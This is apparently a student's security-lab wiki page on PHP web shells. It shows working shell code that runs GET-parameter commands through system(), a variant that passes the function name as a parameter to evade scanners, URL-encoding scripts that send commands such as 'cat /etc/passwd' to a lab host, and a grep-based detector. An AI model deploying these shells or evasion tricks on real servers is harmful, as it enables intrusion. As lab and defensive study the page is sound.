PHP Shell Lab - savannahc502/SavC-TechJournal-SEC260 GitHub Wiki

Pre-Lab Setup

If mod_security was enabled/installed before this lab, make sure to disable it before proceeding.

image

  • Go to /etc/httpd/conf.d and comment out the above lines in mod_security.conf (this only turns the WAF off for the lab; re-enable it when you are done)
  • sudo systemctl restart httpd

The test XSS attack via URL should now work:

image


Installing PHP

yum install php php-common php-cli php-curl
php -v
systemctl restart httpd

Create a basic php file and access it from the web browser (changing index.html to index.php via the mv command):

image

image


Intro to the PHP Shell

We previously practiced using GET parameters with PHP in this lab. In PHP, the system() function runs the operating-system command passed between the parentheses, writes the command's output straight into the response, and returns only the last line of that output, e.g.

image

  • URL Breakdown:
    • I am sending a request to the web server at IP address 10.0.17.103, specifically asking for the "form1.php" file with the query parameter "cmm" set to "whoami".
    • Everything following the ? is the query string of the URL
    • "cmm" is the parameter, and "whoami" is the value of the parameter. These get passed to the script I wrote, and thus the phrase "whoami" is echoed

image

  • Here I changed the echo command in my script to the system command, thus resulting in apache instead of whoami

PHP Shell Vulnerabilities

Create a PHP file and see if you can execute "cat /etc/passwd" through your php file. Remember that a literal space is not valid in a URL, so it has to be percent-encoded as %20; the same applies to other special characters such as &, which would otherwise be read as the start of another query parameter. Then, try other commands.

image

<?php
// Lab web shell: deliberately vulnerable, runs whatever the "cmm" query parameter contains.
$command1 = $_GET["cmm"];
// system() writes the command's full output into the response and returns only
// its last line, so the echo below prints that last line a second time.
$output = system($command1);
echo($output);

?>
  • New test file for the next vulnerabilities

Testing Commands

image

  • Notice that the %20 between cat and /etc/passwd in the URL disappears after the page loads: the browser shows the decoded URL in the address bar, but the request it sent still contained %20, and PHP decoded it back into a space when it filled in $_GET
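The encoding step above, as an added example written for this page (not code from the lab): a POSIX shell helper that percent-encodes a command and builds the query string the way curl would send it. It goes a little beyond the text in that it joins any number of key=value pairs with &, encoding both sides, so a command containing spaces, ; or & cannot break the query string. The host 10.0.17.103 and form1.php come from the lab; the function names and the RUN_LIVE switch are my own assumptions.

```shell
#!/bin/sh
# Added example for this page (not code from the lab): percent-encode a command
# and build the web-shell URL by hand, the way curl would send it.
# Assumptions: host 10.0.17.103 and form1.php are taken from the lab text; the
# function names and the RUN_LIVE switch are my own.
LC_ALL=C
export LC_ALL   # work byte-by-byte so the encoder sees single bytes

# urlencode STRING: percent-encode every byte except the RFC 3986 unreserved
# set (A-Z a-z 0-9 - . _ ~). Stricter than a browser, which leaves "/" alone,
# but always safe: PHP decodes it back before filling $_GET.
urlencode() {
    ue_in=$1
    ue_out=""
    while [ -n "$ue_in" ]; do
        ue_c=${ue_in%"${ue_in#?}"}   # first byte of the remaining input
        ue_in=${ue_in#?}
        case $ue_c in
            [A-Za-z0-9._~-]) ue_out="$ue_out$ue_c" ;;
            *) ue_out="$ue_out$(printf '%%%02X' "'$ue_c")" ;;
        esac
    done
    printf '%s' "$ue_out"
}

# build_url HOST SCRIPT KEY VALUE [KEY VALUE ...]
# Joins any number of key=value pairs with "&", encoding both sides, so a
# command that itself contains "&", ";" or spaces cannot break the query string.
build_url() {
    bu_url="http://$1/$2"
    shift 2
    bu_sep='?'
    while [ $# -ge 2 ]; do
        bu_url="$bu_url$bu_sep$(urlencode "$1")=$(urlencode "$2")"
        bu_sep='&'
        shift 2
    done
    printf '%s' "$bu_url"
}

HOST=10.0.17.103

# The lab's first test, then a command with characters that must be encoded.
build_url "$HOST" form1.php cmm 'cat /etc/passwd'; echo
build_url "$HOST" form1.php cmm 'ls -la /var/www; id'; echo
# Two parameters joined with "&" (function name and command sent separately).
build_url "$HOST" form1.php system system cmm 'uname -a'; echo

# Only talk to the network when a lab target is actually reachable.
if [ "${RUN_LIVE:-0}" = 1 ]; then
    curl -s "$(build_url "$HOST" form1.php cmm 'cat /etc/passwd')"
fi
```

Run it as-is to see the URLs; set RUN_LIVE=1 to send the first one with curl against the lab box. Encoding "/" as %2F is not required (browsers send it raw) but is harmless, since PHP decodes every %XX sequence before populating $_GET.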

image

image

image

image


PHP Shell by Sending the Function as Parameter

Scanning tools may look for PHP files containing common functions like system() and exec(). However, PHP allows a string held in a variable to be called as a function (a "variable function": if $f holds "system", then $f("id") runs system("id")), so the function name, as well as the command, can be supplied in GET or POST parameters and never has to appear literally in the file.

  • Goal: Create a web shell that only has the letters GET in the script.

image

  • Here, I am collecting the php function of system and the command as values in the URL, and the php script uses the parameters those values are assigned to to actually execute the script. Therefore while the system() function is not in the actual PHP script, the output is the same.
  • Use & to join multiple GET parameters, e.g. ?system=system&cmm=whoami for the script below
<?php
echo("This is Savannah's Sneaky Script ");

// Both the function name and the command arrive as query parameters,
// e.g. ?system=system&cmm=whoami
$command1 = $_GET["cmm"];
$command2 = $_GET["system"];
// PHP variable function call: the string in $command2 names the function to run,
// so system() is never written out as a call. The parameter key still leaves the
// word "system" in the file, though; a neutral key such as "f" would avoid even that.
$command2($command1);

?>
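The scanner evasion described in this section, as an added example written for this page (not code from the lab): a grep-based triage scanner that shows why the "function as parameter" shell slips past a scanner that only looks for system()/exec(), and how a second rule, request input combined with a variable function call, still catches it. The three sample PHP files are constructed inline for the demo (the two lab shells plus a benign page); the file names, regexes and function names are my own.

```shell
#!/bin/sh
# Added example for this page (not code from the lab): a grep-based triage
# scanner that shows why the "function as parameter" shell slips past a scanner
# that only looks for system()/exec(), and how to still catch it. The three
# sample PHP files are constructed here for the demo; names are my own.

# A dangerous execution function called by name, e.g. system(
DIRECT_RE='(system|exec|shell_exec|passthru|popen|proc_open)[[:space:]]*\('
# Request input being read, e.g. $_GET[
INPUT_RE='\$_(GET|POST|REQUEST|COOKIE)\['
# A plain variable used as the callee (PHP variable function), e.g. $f(
VARCALL_RE='\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*\('

# naive_scan FILE: what a signature-only scanner does. Exit 0 = flagged.
naive_scan() {
    if grep -Eq "$DIRECT_RE" "$1"; then
        echo "FLAGGED $1: execution function called by name"
        return 0
    fi
    echo "missed  $1"
    return 1
}

# scan_php FILE: also flag request input combined with a variable function
# call, which is the shape of the sneaky shell. Exit 0 = suspicious.
scan_php() {
    if grep -Eq "$DIRECT_RE" "$1"; then
        echo "SUSPICIOUS $1: execution function called by name"
        return 0
    fi
    if grep -Eq "$INPUT_RE" "$1" && grep -Eq "$VARCALL_RE" "$1"; then
        echo "SUSPICIOUS $1: request input feeds a variable function call"
        return 0
    fi
    echo "clean      $1"
    return 1
}

# write_samples DIR: constructed samples, the two lab shells plus a benign page.
write_samples() {
    cat > "$1/direct.php" <<'EOF'
<?php
$command1 = $_GET["cmm"];
$output = system($command1);
echo($output);
?>
EOF
    cat > "$1/sneaky.php" <<'EOF'
<?php
$command1 = $_GET["cmm"];
$command2 = $_GET["system"];
$command2($command1);
?>
EOF
    cat > "$1/benign.php" <<'EOF'
<?php
$name = $_GET["name"];
echo "Hello, " . htmlspecialchars($name);
?>
EOF
}

DEMO_DIR=$(mktemp -d)
write_samples "$DEMO_DIR"
echo "signature-only scanner:"
for f in "$DEMO_DIR"/*.php; do naive_scan "$f" || true; done
echo "scanner with the variable-function rule:"
for f in "$DEMO_DIR"/*.php; do scan_php "$f" || true; done
rm -rf "$DEMO_DIR"
```

The signature-only pass flags direct.php and misses sneaky.php; the second pass flags both and leaves benign.php alone. The variable-function rule is a triage heuristic, not a verdict: legitimate code that stores a callback name in a variable will also trip it, and a plain `grep -r system` would still find the sneaky script because its parameter key contains the word.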